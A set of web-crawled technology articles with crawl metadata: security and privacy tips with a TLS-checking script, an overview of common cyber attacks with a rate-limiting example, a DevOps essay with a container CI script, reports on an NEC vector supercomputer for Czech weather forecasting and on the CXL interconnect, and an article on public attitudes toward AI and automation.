- Try to leave as little personal information as possible on sites that can be viewed by lots of visitors (e.g., social networks). Check the privacy settings in your social media account. Don’t post everything to everyone; organize your friends into lists/circles. Publicly available information can be used to track victims more closely and to gain access to other resources.
- You can also use special browser plugins such as NoScript for Firefox, which blocks any active content unless you whitelist the pages – this is useful for social media, as it prevents someone tracking you down by likejacking pages.
Finally, make sure your device is well protected against potential surveillance. This includes installing an updated security product and applying the latest updates for your operating system and software (e.g., Office, Flash Player, Acrobat Reader or Java).
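The advice about public Wi-Fi comes down to never sending credentials over a channel whose identity you have not verified. The sketch below is a generic illustration, not a Kaspersky tool: it uses only Python's standard library to confirm that a server presents a valid certificate and negotiates a modern TLS version before any login form is submitted, and the host name is an arbitrary placeholder.

```python
import socket
import ssl


def check_tls(host: str, port: int = 443) -> None:
    """Report the negotiated TLS version and the certificate subject for a host.

    ssl.create_default_context() enables certificate validation and hostname
    checking, so the handshake fails loudly on spoofed hotspots that present
    self-signed or mismatched certificates.
    """
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
            subject = dict(pair[0] for pair in cert["subject"])
            print(f"{host}: {tls.version()}, certificate issued to "
                  f"{subject.get('commonName')}")


if __name__ == "__main__":
    try:
        check_tls("www.example.com")  # placeholder host
    except (ssl.SSLError, ssl.CertificateError) as exc:
        print("Do not send credentials over this connection:", exc)
```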
<urn:uuid:0e5460a6-2f2c-4058-89ab-d940b49931e3>
CC-MAIN-2022-40
https://informationsecuritybuzz.com/expert-comments/67771/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00452.warc.gz
en
0.9001
665
2.640625
3
If you think “cyber attack” only means “data theft,” think again. Your company should be prepared to defend itself against many different kinds of cyber attacks—and, honestly, these things are creepy enough to keep you awake at night:
- Data theft. Theft of data is, of course, a major concern. Boards should know which types of information could be valuable to an attacker—including personally identifiable information, intellectual property, customer lists, strategies, and M&A information—and how the company is protecting them.
- Denial of service. Hackers may launch a “denial of service” attack that stops your company from operating its business. Not only are these attacks on the rise, but early this year the BBC was the victim of what has been suggested was the largest denial of service attack in history. Beyond the embarrassment, a DoS attack can be costly in terms of lost business. These attacks may be sponsored by a competitor or national government, or be launched by hackers seeking glory or even ransom.
- Ransoms. A new favourite attack is for hackers to infiltrate a system and install code that causes the business to grind to a halt. This can take the form of a DoS attack or the encryption of company data. The attackers then notify the victimised company that they will give back control of the business in exchange for a small fee, perhaps as little as $3,000. This isn’t very much money, but hackers can do this thousands of times a week and walk away with a big score.
- Zombification. Millions of computers across the world are, right now, serving as “zombies” or “bots” that hackers are using to launch other attacks, host stolen information, and otherwise support their illegal activities. An attacker may be using your company’s systems without your even knowing it, creating reputational risks even if they don’t or can’t steal data or deny service.
These four are just a handful of common attacks; new ones are being created every day. Check out this post to learn about questions you and your board should ask your CISO so they can keep vigilant on your behalf!
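For the denial-of-service scenario above, one common first line of defence is rate limiting requests at the application edge. The following is a generic, illustrative token-bucket limiter in Python, not a complete DoS defence or a product recommendation; the thresholds and the use of a source address as the client identifier are assumptions made purely for demonstration.

```python
import time
from collections import defaultdict


class TokenBucket:
    """Allow a steady request rate per client with a small burst allowance."""

    def __init__(self, rate_per_sec: float = 5.0, burst: int = 10):
        self.rate = rate_per_sec
        self.burst = burst
        self.tokens = defaultdict(lambda: burst)      # tokens left per client
        self.updated = defaultdict(time.monotonic)    # last refill time per client

    def allow(self, client_id: str) -> bool:
        now = time.monotonic()
        elapsed = now - self.updated[client_id]
        self.updated[client_id] = now
        # Refill tokens earned since the last request, capped at the burst size.
        self.tokens[client_id] = min(self.burst,
                                     self.tokens[client_id] + elapsed * self.rate)
        if self.tokens[client_id] >= 1:
            self.tokens[client_id] -= 1
            return True
        return False  # drop or challenge the request instead of serving it


limiter = TokenBucket(rate_per_sec=2, burst=5)
for i in range(8):
    # The first few requests pass; a rapid flood from one source gets throttled.
    print(i, limiter.allow("203.0.113.7"))
```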
<urn:uuid:ae912344-5f60-4ab8-a1bf-e91ce9b54d76>
CC-MAIN-2022-40
https://www.diligent.com/en-gb/blog/four-common-hacking-attacks-need-know/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00452.warc.gz
en
0.953548
733
2.515625
3
Iterative software development is one of the most popular software engineering best practices. It has been widely used for nearly twenty years as a means of alleviating the pitfalls of conventional “waterfall approaches” to software development. In recent years, iterative approaches to releasing software products and services are not confined to development cycles but rather comprise operational aspects as well. Specifically, in each cycle, software development teams are concerned not only about developing and testing working software, but also about deploying and validating the software in its operational environment. This novel paradigm is usually termed “DevOps”, as it combines both development and operations activity as part of the software development lifecycle (SDLC). The emergence of DevOps is associated with the expanded use of cloud computing infrastructures (e.g., public cloud services) for the deployment of software products and services. When deploying a software product on a cloud, development teams must account for the configuration and operation of the cloud infrastructure, as the latter can greatly impact the performance, scalability, and availability of the product, along with its overall adherence to business requirements. The DevOps paradigm enables IT-based enterprises to develop and deploy software in a way that takes into account both development and deployment aspects, while at the same time considering their combined optimization. This provides software vendors (notably high-tech startups) with exceptional agility, which sets them apart from their more bureaucratic and less flexible competitors. For these reasons, it is important that software vendors optimize their DevOps processes by leveraging the latest trends in DevOps engineering, while using modern tools and techniques. DevOps comprises processes that reside at the intersection of development, operations and Quality Assurance (QA). In a typical DevOps environment, skilled engineers are able to perform iterative release management, through considering both development and operations at all phases of the SDLC. DevOps benefits from full-stack engineers, who carry out development end-to-end, from requirements engineering to software deployment and maintenance. During the last couple of years, DevOps has also been associated with the automation of the infrastructure and the operations of any IT-based company. In particular, DevOps engineers are nowadays using a wide array of tools that help them automate testing, deployment, and operation. Automation is very important, not only because it eliminates time-consuming and error-prone processes, but mainly because it facilitates the execution of tests and deployment processes repeatedly. Overall, modern DevOps is characterized by automation and end-to-end management, which are nowadays empowered by the trends of microservices, containerization, and continuous integration. Microservices are small software components which enable companies to manage their systems as collections of vertical functionalities rather than based on the deployment of large-scale, inflexible application bundles. In this context, microservices provide flexibility and modularity, which ease the collaboration of the development team, as different members can focus on complementary vertical functionalities. This avoids conflicts and overlaps during the development of complex systems and leads to more effective management of the team.
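To make the idea of a small vertical functionality concrete, here is a minimal sketch of a single-purpose registration-style service using only Python's standard library. It is illustrative only: the endpoint, port, and in-memory store are assumptions, and a production microservice would add persistence, authentication, and proper packaging.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# In-memory store standing in for the service's own private database.
REGISTERED_USERS = {}


class RegistrationService(BaseHTTPRequestHandler):
    """One vertical functionality (user registration) exposed over HTTP."""

    def do_POST(self):
        if self.path != "/register":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", 0))
        user = json.loads(self.rfile.read(length) or b"{}")
        REGISTERED_USERS[user.get("email", "")] = user
        body = json.dumps({"status": "registered",
                           "count": len(REGISTERED_USERS)}).encode()
        self.send_response(201)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Each microservice runs, scales, and is deployed independently of the rest.
    HTTPServer(("0.0.0.0", 8080), RegistrationService).serve_forever()
```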
Microservices enable the structuring and organization of functionalities at both the technical and the business level. Different business functionalities (e.g., user registration, data collection, data analytics, notifications) can be developed and organized independently from each other. This provides a number of advantages. Nevertheless, leveraging these advantages implies a significant operational overhead, which is required to support the operation of applications that are split into multiple, independently operating modules. Furthermore, a great degree of organizational alignment is needed, as the development and deployment team can no longer rely on traditional horizontal “siloed” roles such as software developers, QA engineers, and system administrators. In the past, these roles were in charge of developing and deploying the system as a whole, based on regular, yet minimal communications between them. In modern DevOps, older horizontal roles must co-exist and collaborate in each vertical microservice-based functionality. We are also witnessing a proliferation of DevOps engineers, who master microservices and play a cross-cutting role in DevOps projects. DevOps engineers engage in full stack development activities, as well as in configuration and validation of operational aspects such as security, operational readiness, and testing. Hence, they are in charge of infrastructure and application development at the same time. Currently, there is a proclaimed talent gap in DevOps engineers, who are expected to have multiple and multidisciplinary skills, especially when engaging in complex projects. However, in the medium term, the employment of DevOps engineers in enterprise software development teams is expected to obviate some of the traditional horizontal roles such as QA engineers. This is because DevOps engineers will be in charge of testing and deployment, with minimal or no involvement of traditional QA experts. The deployment of a new version of an application to production has always been quite challenging as a result of the heterogeneity and incompatibility of the development and production environments. In particular, different languages and their artifacts (e.g., Java archives, Node.js source code, Python or R scripts) lead to extreme heterogeneity upon the release of a new version of their runtime. In turn, this leads to incompatibilities and a steep learning curve for any new member of a development team, who needs to become familiar with complex environments prior to becoming productive. Moreover, in several cases, the incompatibility of development and deployment runtimes leads to problematic deployments and system downtimes, including very complex processes to test new versions. All these big headaches are alleviated by containerization technologies such as Docker. The latter enables bundling and deployment of software with its runtime environment, which facilitates compatibility and reliable deployments. Containerization is becoming a foundation for DevOps, as it offers a controlled environment that combines the right software with the proper operational environment. As such, “containerized” software can be directly moved from development to QA and later to production, based on a set of simple and safe configuration activities, which obviate the need for complex compatibility assurance. DevOps is greatly propelled by tools and techniques for continuous integration.
Rather than pushing integration and QA to the end of a release, DevOps mandates that continuous integration takes place and that relevant feedback is provided to developers. This requires a responsive infrastructure, which makes it very easy for developers to fix problems early on, as this improves overall quality. DevOps is largely about setting up such a responsive infrastructure, which facilitates integration and testing in order to shorten release cycles and enable early reception of feedback. Therefore, continuous integration servers and tools such as Bamboo, Jenkins and, more recently, Drone are indispensable elements of any non-trivial DevOps infrastructure. DevOps is certainly the present and the future of software development. Microservices, containers and continuous integration tools are certainly among its core elements. Nevertheless, DevOps is much more than a batch of modern tools such as Docker and Jenkins. It is primarily a new philosophy for organizing and managing teams, towards optimal efficiency and quality. Prior to delving into details about deploying and using tools, it is therefore important to get acquainted with this new philosophy and how it could work for your existing or prospective projects.
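As an illustration of the automation described above, the sketch below shows a tiny continuous-integration step written in Python that builds a container image and runs the test suite inside it. It is a hedged example rather than a prescription: it assumes the Docker CLI and pytest are available on the build agent, and the image tag and paths are placeholders.

```python
import subprocess
import sys

IMAGE = "example-app:ci"  # placeholder image tag


def run(cmd: list[str]) -> None:
    """Run a shell command and fail the pipeline fast if it fails."""
    print("+", " ".join(cmd))
    result = subprocess.run(cmd)
    if result.returncode != 0:
        sys.exit(result.returncode)


def main() -> None:
    # 1. Build an immutable image that bundles the app with its runtime.
    run(["docker", "build", "-t", IMAGE, "."])
    # 2. Run the test suite inside the same environment that will ship.
    run(["docker", "run", "--rm", IMAGE, "pytest", "-q"])
    # 3. On success, a real pipeline would push the image to a registry here.
    print("CI step passed; image ready for promotion to QA/production.")


if __name__ == "__main__":
    main()
```

A CI server such as Jenkins or Drone would typically invoke a step like this on every commit, which is what makes the feedback loop described above continuous.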
<urn:uuid:bc4daa46-d013-4fea-a213-7cfeeca08a84>
CC-MAIN-2022-40
https://www.itexchangeweb.com/blog/modern-devops-for-software-quality-and-automation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00452.warc.gz
en
0.950464
1,746
2.6875
3
There are two different Auroras right now in supercomputing. There is the shape-shifting, legendary, and maybe even mythical “Aurora” and now “Aurora A21” exascale supercomputer that was being built by Intel with “Knights” many core processors and now, if Intel can get them out the door, with a combination of “Sapphire Rapids” Xeon SP processors and “Ponte Vecchio” Xe GPU accelerators, for Argonne National Laboratory. And then there are the real Aurora vector-engine based systems from supercomputer maker NEC that you have been able to buy for the past four years. The Czech Hydrometeorological Institute (CHMI), which models and forecasts weather, climate, air quality, and hydrology for the Czech Republic, has just bought a liquid cooled hybrid supercomputer based on X86 processors and Aurora vector engines to radically improve its simulation capabilities. CHMI is headquartered in the capital city of Prague, notably with offices in the beer haven of Plzeň in western Bohemia. (Doesn’t that sound idyllic?) Like many smaller meteorological institutions in Europe and some of the bigger ones in Japan and Asia throughout the decades, CHMI has been a longtime user of NEC parallel vector processors, which are akin to the original Cray vector machines from days gone by. And, interestingly, NEC is the last of the vector supercomputer makers that is still in the game, but just the same, it has had to go with a parallel processor-accelerator approach with the Tsubasa SX parallel vector architecture, based on the Aurora accelerators, to bring down costs and boost scalability. CHMI, whose lovely headquarters is shown in the feature image above, has been on the NEC vector computing ride for a long time. So it is not at all surprising that the meteorological agency would stick with this architecture, however modified it has become. And while many customers have moved away from the SX architecture (those in the United States, like the National Center for Atmospheric Research in 1996, were prevented from buying NEC and Fujitsu supercomputer gear after dumping charges and import tariffs were placed on these two vendors following complaints by Cray), the vector machines, like those of Cray and Fujitsu and even IBM with the vector-assisted 3090-VF mainframes from years gone by, were all good machines and elegantly designed. Through 2006, the last year for which we have any data, NEC had sold north of 1,000 SX vector supercomputers worldwide. It is probably close to double that now. As we reminded everyone when the Aurora vector engines surfaced in the fall of 2016 ahead of the SC16 supercomputing conference, the most famous NEC vector supercomputer was the Earth Simulator system, which was the most powerful machine in the world from 2001 through 2004. It had 5,120 vector engines, based on its SX-6 design, delivering a then-stunning 35.9 teraflops at a cost of $350 million. This machine was upgraded to the ES2 system in 2009, using the SX-9 architecture. The $1.2 billion Project K supercomputer was supposed to have vector partitions made by NEC, but the Great Recession compelled NEC to pull out and leave the whole deal to Fujitsu for the engine and Hitachi for the interconnect. (Fujitsu eventually took over the whole project.) The feeds and speeds of the initial Aurora Vector Engine 10A, 10B, and 10C devices were detailed here, and we did a follow-up deep dive into the architecture a few weeks later there.
At the time, the Aurora vector engines could absolutely beat Intel “Skylake” and “Knights Landing” and Nvidia “Volta” V100 GPUs on price and could beat Intel CPUs on double precision flops performance; the initial Aurora chips had 48 GB of HBM2 memory, and could beat the tar out of any of these other devices on memory bandwidth. With the kicker Vector Engine 20A/20B devices, NEC has boosted performance to 3 teraflops, up 22.5 percent compared to the prior Vector Engine A series at 2.45 teraflops, and memory bandwidth to 1.5 TB/sec, up 25 percent from the 1.2 TB/sec with the HBM2 stack in the first Aurora chips. CHMI ordered a new Tsubasa supercomputer from NEC’s German subsidiary last September and it was installed and operational in December, although the meteorological agency is just talking about it now. The cluster that CHMI has bought has 48 two-socket AMD Epyc 7002 series nodes, each with eight of the latest Vector Engine 20B vector engines in its PCI-Express 4.0 slots, for a total of 384 vector engines. Those 48 nodes have a combined 18 TB of HBM2 memory plus 24 TB of memory on the X86 hosts, plus a 2 PB parallel file system based on NEC’s LxFS-z storage, which is the Japanese company’s implementation of the Lustre open source parallel file system atop Sun Microsystems’ (now Oracle’s) ZFS file system. The compute and storage nodes are interlinked using an Nvidia 200 Gb/sec HDR InfiniBand network, and they are also kept from overheating by direct liquid cooling. The Czechoslovak Republic was established at the end of World War I in 1918, and shortly thereafter the National Meteorological Institute, the predecessor to the CHMI, was formed. The organization is an expert in air pollution dispersion models, and is also a big contributor, along with France, to the ALADIN numerical weather prediction system, which was in use by 26 countries when CHMI bought a 320-node Xeon E5 cluster from NEC with 7,680 cores and using 100 Gb/sec EDR InfiniBand interconnect to do its weather modeling; this system had 1 PB of LxFS-z storage. Over the years, CHMI has had a fair number of NEC systems, but because they do not often break into the Top500 rankings of systems that run High Performance Linpack and then brag about it (which is not the same thing as a list of the top 500 supercomputers in the world for true HPC applications), we can’t find all of them. We did find a few, though. In 2008, CHMI had a single NEC SX-6/8A-32, which is a 32 vector engine system that is based roughly on the same technology as Earth Simulator, plus a bunch of Sun Microsystems Sun Fire Opteron servers for Oracle databases and other workloads. And in 2016, CHMI had two NEC SX-9 nodes, with 16 vector processors and 1 TB of main memory each, running its simulations, plus some Oracle T5-8 servers running databases. These, of course, are the engines used in the ES2 kicker to Earth Simulator. What NEC really needs now is to get an ES3 deal with the Japanese government – but given the success and cost of the “Fugaku” system at RIKEN, with its Arm processors and fat integrated vector engines, this seems unlikely. But stranger things have happened. NEC certainly has a roadmap going out a few years: The question is how hard NEC will push performance alongside that bandwidth push shown above. Moving to 7 nanometer technologies could allow at least a doubling of performance. We shall see what NEC does next year.
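Memory bandwidth is the headline number for these vector engines, and a STREAM-style triad is the classic way to estimate what a system actually sustains. The sketch below is a rough, illustrative measurement using NumPy on whatever host it runs on; it says nothing about the SX-Aurora itself, and the array size is an arbitrary assumption chosen to exceed typical cache sizes.

```python
import time

import numpy as np

N = 20_000_000            # ~160 MB per float64 array; large enough to miss caches
a = np.zeros(N)
b = np.random.rand(N)
c = np.random.rand(N)
scalar = 3.0

start = time.perf_counter()
a[:] = b + scalar * c     # STREAM "triad": two reads and one write per element
elapsed = time.perf_counter() - start

# Roughly 3 x 8 bytes move per element (read b, read c, write a).
bytes_moved = 3 * N * 8
print(f"Sustained bandwidth: {bytes_moved / elapsed / 1e9:.1f} GB/s")
```

Run on a typical laptop this lands in the tens of GB/s, which puts the 1.5 TB/sec figure quoted for the Vector Engine 20B's HBM2 stacks into perspective.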
<urn:uuid:e4b5e14e-7479-4f08-a798-759d93e2a43a>
CC-MAIN-2022-40
https://www.nextplatform.com/2021/02/12/czech-republic-sticks-with-nec-vector-engines-for-weather-modeling/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00452.warc.gz
en
0.96142
1,567
2.78125
3
The system world would have been a simpler place if InfiniBand had fulfilled its original promise as a universal fabric interconnect for linking all manner of devices together within a system and across systems. But that didn’t happen, and we have been left with a bifurcated set of interconnects ever since. Let’s rattle them off for fun. There are the memory buses that link DDR4 and HBM2 memory to processors. There is some agreement on how to etch controllers for these memories, since they all have to speak the same physical memory, but there are still many different memory controller designs. There are NUMA interconnects between sockets in a single physical machine as well as NUMA interconnects that span multiple server nodes to create shared memory systems that span two, four, eight, or sixteen sockets. These are all largely proprietary, and have been for as long as there has been NUMA iron. (Nearly three decades.) Then there is the PCI-Express bus and its accelerated forms. This includes NVM-Express acceleration for flash, which gets the CPU hosts out of the loop when the network wants to access data on flash, as well as GPUDirect over PCI-Express, which links GPU memories to each other without host involvement in a similar fashion. AMD’s Infinity Fabric is a kind of superset of PCI-Express, borrowing techniques from its HyperTransport NUMA interconnect, to create a universal fabric for linking CPUs to each other, GPUs to each other, and CPUs to GPUs. Nvidia’s NVSwitch is a fabric that speaks load/store memory semantics that links GPU memories to each other in something akin to a NUMA setup, but just for the GPUs. (NVSwitch could, in theory, be used to create a switched fabric that links CPU memories to GPU memories provided that a CPU had NVLink ports on it, but thus far only IBM’s Power9 chips had such ports and NVSwitch was not used in this fashion.) The CCIX accelerator interconnect uses the PCI-Express transport and protocol as its foundation; it was created initially by Xilinx, then endorsed by AMD, and actually adopted by Arm Holdings as an accelerator interconnect as well as a NUMA interconnect between Arm CPUs. It has been shown off in various Neoverse CPU designs, but has yet to be implemented in an actual volume Arm server chip. IBM’s CAPI interconnect ran atop PCI-Express 3.0 or PCI-Express 4.0 transports, but the OpenCAPI interface runs on specialized high speed SerDes on Power9 and Power10 chips, circuits that are being used not only to link accelerators in a coherent fashion to Power CPUs, but also to link the DDR5 main memory in the impending Power10 chip to the processor. The Gen-Z protocol out of Hewlett Packard Enterprise had its own way of linking a fabric of server nodes to a giant shared memory that we still think is interesting. And finally, InfiniBand and Ethernet keep getting higher and higher bandwidth and have low enough latency to do interesting things. But their latencies are still too large for creating coherent memory spaces for diverse compute engines to play in together. Still, like time, bandwidth increases, latency drops, and the plethora of new protocols heal all wounds. And now, that diversity of interconnects is opening up the options for system architecture.
The resulting architectures might be more complex, but they are also potentially richer and could result in the ability not only to co-design hardware and software more tightly in future hybrid systems and distributed computing clusters built from them, but to dial up the right combination of price and performance to meet particular budget requirements. That is the impression we took away from a keynote address that Debendra Das Sharma, Intel Fellow and director of I/O technology and standards at Intel, gave at the recent Hot Interconnects 28 conference. Das Sharma gave an overview of the Compute Express Link, or CXL, interconnect that Intel has developed in response to the myriad accelerator and memory interconnects that have been put out there in the past decade. CXL came last, resembles many of the protocols mentioned above, and may not be perfect in all use cases. But it is the one interconnect that seems destined to be widely adopted, and that means we have to pay attention to how it is evolving. Das Sharma gave us an interesting glimpse of this future, which helps fulfill some of the ideas driving disaggregated and composable architectures — which we are a big fan of here at The Next Platform because it allows for the sharing of compute and memory resources and a precise (yet flexible) fitting of hardware to the application software.
It All Starts With The PCI-Express Bus
Although sufficient for its intended design as a peripheral interconnect for servers, the PCI-Express bus did not offer very high bandwidth for many years — certainly not high enough to link memories together — and importantly was stuck in the mud at the PCI-Express 3.0 speed for four or five years longer than the market could tolerate. Ethernet and InfiniBand were essentially stuck in the same mud at 40Gb/sec speeds at the same time until signaling technologies to push up bandwidth were painstakingly developed. This is a great chart that gives you the transfer rates and latencies for the two broad types of interconnects, which you need to keep in mind as you think about any of these interconnects: If you wanted to add another important dimension here, it would be the length of the possible connections between devices. But suffice it to say, low latency always implies short distance because of the limit of the speed of electrons in copper and photons in glass, and latency always increases with greater distance because of retimers, switch hops, and such. The good news is that, at least for the next several generations between PCI-Express 4.0 and 7.0, it looks like we will see a two-year cadence of bandwidth increases with the PCI-Express interconnect, along with PCI-Express switch fabrics that will have lots of bandwidth and reasonable radix, and with only a few tiers of switching they will be able to span racks of gear pretty easily and, if bandwidth is held constant to drive up latency, could even span more than a few racks. This is all important in the context of the CXL coherent overlay for PCI-Express. With the PCI-Express 6.0 protocol, which we talked about in detail a year ago with Das Sharma, the bandwidth is going up through the addition of PAM-4 signaling, which has been implemented on several generations of datacenter switch ASICs already, and which encodes two bits in each signal coming out of the chip, thus doubling the effective bandwidth at a given clock speed.
And the real clever thing is FLIT encoding and error correction, which is new and which has a lot less overhead than forward error correction does, and so the latency on PCI-Express 6.0 is going down, not up. And going down by half, which is just huge. And by shifting to a denser pulse amplitude modulation encoding — perhaps PAM-16 — the effective bandwidth can be doubled up again and latency dropped a bit with the PCI-Express 7.0 spec due around the end of 2023 and implemented probably two years later if history is any guide. We did a deep dive into the CXL protocol two years ago, and we are not going to go through all of that again from the beginning. But this chart sums up the three elements of the protocol rather nicely for a quick review: Here are the important things to consider. The CXL.io layer is essentially the same as the PCI-Express protocol, and the CXL.cache and CXL.memory layers are new and provide similar latency to that of SMP and NUMA interconnects used to glue the caches and main memories of multisocket servers together — “significantly under 200 nanoseconds” as Das Sharma put it — and about half the latency of the raw PCI-Express protocol itself. It is that latency drop — and further ones that we are expecting in the future — combined with the drumbeat cadence of bandwidth increases that makes CXL an interesting tool in the system architect’s toolbox. The CXL protocol specification, in fact, says that a snoop response on a snoop command when a cache line is missed has to be under 50 nanoseconds pin to pin, and for memory reads, pin to pin as well, has to be under 80 nanoseconds. By contrast, a DDR4 memory access is around 80 nanoseconds, and a NUMA access to far memory in an adjacent socket is around 135 nanoseconds, according to system designers at Microsoft. And as a further refresher, here are the three different usage models of CXL and the parts of the protocol they will use: While the CXL 1.0 and 1.1 specs were about point-to-point links between CPUs and accelerator memory or between CPUs and memory extenders, as you can see from the use cases above, the forthcoming CXL 2.0 spec will allow a switched fabric that allows multiple Type 1 and Type 2 devices as shown above to be configured to a single host and have their caches be coherent, as well as allowing for memory pooling across multiple hosts using Type 3 memory buffer devices. This is what expands CXL from a protocol that links elements within a server chassis to one that links disaggregated compute and memory across a rack or possibly several racks — and frankly, puts CXL in some kind of contention with the Gen-Z protocol, despite all of the hatchet-burying that we have discussed in the past. Economics will drive the pooling of main memory, and whether or not customers choose the CXL way or the Gen-Z way. Considering that memory can account for half of the cost of a server at a hyperscaler, anything that allows a machine to have a minimal amount of capacity on the node and then share the rest in the rack — with all of it being transparent to the operating system and all of it looking local — will be adopted. There is just no question about that. Memory area networks, in one fashion or another, are going to be common in datacenters before too long, and this will be driven by economics. Das Sharma had some other possible future directions for the use of CXL in systems. Let’s go through them. 
The first scenario is for both memory capacity and memory bandwidth to be expanded through the use of CXL: In this first scenario, chunks of DRAM are attached to the system over CXL and augment the bandwidth and capacity of the DDR DRAM that hangs off the traditional memory controllers. But over time, Das Sharma says that chunks of main memory could be put on the compute package itself — Foveros chip stacking is how Intel will do it — and eventually the on-chip DDR memory controllers could be dropped and just PCI-Express controllers running CXL could connect to external DRAM. (This is, in effect, what IBM is doing with its OpenCAPI Memory Interface, although it is using a proprietary 32Gb/sec SerDes to do it instead of a PCI-Express controller.) It is very likely that the on-package memory referenced in the chart above would be HBM, and probably not very much of it to reduce package costs. The idea of memory that plugs in like a disk or flash drive is a long time coming. In scenario two, CXL is used to create non-volatile DIMM memory for backing up all of main memory in the system: This NVDIMM memory is based on a mix of persistent memory (Optane 3D XPoint memory in Intel’s world) and DDR DRAM and, in some cases, this is converted to computational storage with the addition of local compute inside of the NVDIMM. In scenario three that Das Sharma posited, the system will use a mix of CXL computational storage, CXL memory, and CXL NVDIMM memory, all sharing asymmetrically with the host processor’s DDR4 main memory using the CXL protocol. Like this: And in scenario four, CXL disaggregation and composability is taken out to the rack level: In essence, the rack becomes the server. There are some challenges that have to be dealt with, of course. But having a whole rack that is load/store addressable is very interesting indeed. It remains to be seen where the system software to control this will reside, but it looks like we need a memory hypervisor. Maybe Intel will snap up MemVerge and control this key piece of software as it develops.
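The bandwidth-doubling cadence described earlier can be turned into rough numbers. The sketch below is back-of-the-envelope arithmetic, not official PCI-SIG figures: it assumes the commonly cited per-lane raw rates of 16, 32, and 64 GT/s for PCI-Express 4.0, 5.0, and 6.0, and it ignores encoding and protocol overheads, which reduce delivered throughput in practice.

```python
# Raw transfer rate per lane in gigatransfers per second (assumed, see note above).
RAW_GT_PER_S = {"PCIe 4.0": 16, "PCIe 5.0": 32, "PCIe 6.0 (PAM-4)": 64}
LANES = 16  # a typical x16 slot for a GPU, accelerator, or CXL memory expander

for gen, gt in RAW_GT_PER_S.items():
    # One transfer carries one bit per lane, so divide by 8 to get bytes.
    gb_per_s = gt * LANES / 8
    print(f"{gen}: ~{gb_per_s:.0f} GB/s per direction on an x{LANES} link")

# PAM-4 keeps the PCIe 6.0 channel at the same symbol rate as 5.0 but encodes
# two bits per symbol, which is how the effective bandwidth doubles again.
```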
<urn:uuid:8b84384d-b0c8-4585-8168-66e1aa39be47>
CC-MAIN-2022-40
https://www.nextplatform.com/2021/09/07/the-cxl-roadmap-opens-up-the-memory-hierarchy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00452.warc.gz
en
0.951237
2,645
2.5625
3
Public opinion towards technology varies significantly across the globe – a recent study by the Pew Research Center revealed people in Asia are substantially more positive about AI and automation than their peers in the West. These attitudes shape how technology is perceived and adopted, and leaders must engage with them in good faith when implementing technologies that impact people’s lives.
Public opinion on AI and automation
The Pew Research Center study shows stark global differences in public attitudes towards robotics and AI. When asked their opinion on the technologies, more than 60% of respondents in Singapore, South Korea, Taiwan and Japan said they were good for society. By comparison, fewer than half of respondents in the US, Canada, and much of Western Europe shared this positive view. France has the most negative opinion of AI and robotics overall, with less than 40% thinking the technologies have been good for society. These attitudes affect the extent to which given technologies will be accepted within a society, and many have failed after clashing with public opinion. Low adoption of Covid-19 tracing apps in the UK and US, for example, can be attributed in part to distrust of the location-tracking technology they rely on. Vargha Moayed, chief strategy officer of robotic process automation (RPA) software vendor UiPath, says national attitudes shape the reception of its technology by clients and their employees. “Japan is the most forthcoming and there is no fear of robots per se,” he explains. “Japanese companies have always been very good at reskilling their people, so they just accept it and even embrace AI and technology.” By contrast, many European countries tend to be more concerned with the way AI and automation will affect citizen well-being and the ethical questions raised by technology, Moayed explains. As a result, UiPath pays careful attention to the views of its clients’ employees – which have a “strong correlation” with public opinion, Moayed says – when implementing its systems, as they have a significant impact on a successful transition to automation.
The roots of technology mistrust
Sometimes, public mistrust of a given technology reflects deep-seated cultural values. Baobao Zhang, who researches AI governance and public opinion on AI at Cornell University, has found people often misunderstand what AI and machine learning are, and instead base opinions on cultural or community attitudes and “gut instinct”. Patrick Sturgis, a professor of quantitative social science at the London School of Economics, says this can be seen in public opinion research. People often support science and technology in the abstract, but their feelings about specific advancements will vary according to media portrayals as well as their previously held beliefs. “These are areas where… science and technology tend to come into conflict with people’s core values,” says Sturgis. “Obviously religion is one important marker, but they can be kind of humanist values as well.” The Pew Research study found that, in every country except India and Russia, those with a higher education level are more likely to support AI and robotics. Sturgis says there is evidence that a higher education level makes people more trusting of science in general, too. “As a university graduate, you are more likely to understand the process of science, to reject conspiracy theories about science,” he says. But technology leaders must not dismiss public mistrust of tech as irrational or uneducated.
“There are things that people should be wary of, and rightfully so,” says Zhang, such as racial bias in AI systems used by law enforcement. Sturgis adds that people with a lower socio-economic status might rightly question whether they will benefit from technological advancements. “There’s a justified suspicion that ‘we’re not going to gain from this, someone’s going to gain but it’s not going to be us’,” he says. “If there’s going to be oil taken out of the ground near here, am I going to have cheaper energy bills? Probably not, but I might have a smoke-filled environment and trucks going by.”
Building trust in innovation
Perhaps recognising that people’s concerns about innovations are often well founded, many scientific organisations are changing how they engage with the public, away from ‘educating’ towards a conversational approach, says Sturgis. “I think over the past few decades that’s changed to a more kind of… dialogic approach where the idea is to engage and involve and have a two-way conversation so that people are not being spoken at, but are part of the whole process,” he says. But there is a difference between good-faith engagement and a public-relations exercise designed to curtail a possible backlash. “Trust in science really should be based on trustworthiness of the scientific actors rather than just promoting trust,” he says. Zhang says that she is seeing an increasing movement from tech companies to be more transparent, allowing experts from outside the company to test out new developments and find flaws. However, some have questioned the extent to which voluntary commitments to transparency will prevent organisations from using AI harmfully. UiPath advises its clients to pursue “bottom-up” change management programmes when introducing automation. This means involving employees from the beginning of a transition and allowing them to try out the software themselves. But Moayed also says clients need to acknowledge the “legitimate apprehension” of employees who will have seen huge technological change within their lifetimes. “It’s hypocritical to say that technology does not destroy some categories of jobs,” Moayed says. “You need to manage that transition, in terms of being able to provide opportunities for people that are going to be displaced to acquire new skills.” “Trying to slow down innovation is silly,” he adds. “On the other hand, being 